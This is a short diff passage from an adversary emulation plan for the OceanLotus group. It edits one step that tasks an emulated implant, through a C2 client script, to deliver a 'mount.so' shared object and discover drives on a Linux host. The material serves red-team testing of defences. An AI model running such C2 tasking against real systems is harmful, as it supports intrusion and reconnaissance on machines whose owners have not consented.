center-for-threat-informed-defense/adversary_emulation_library/ocean_lotus/Emulation_Plan/OceanLotus_Scenario.md

    [SUCCESS] 2023/08/24 19:38:10 Successfully set task output.
    ```

-2. Upload shared object to execute `mount` command to discover drives on host.
+1. Download `mount.so` shared object to execute the `mount` command to discover drives on the Linux host.
    ```
    ./evalsC2client.py --set-task 01020304 '{"cmd":"Rota_upload_file", "payload": "mount.so"}'
    ```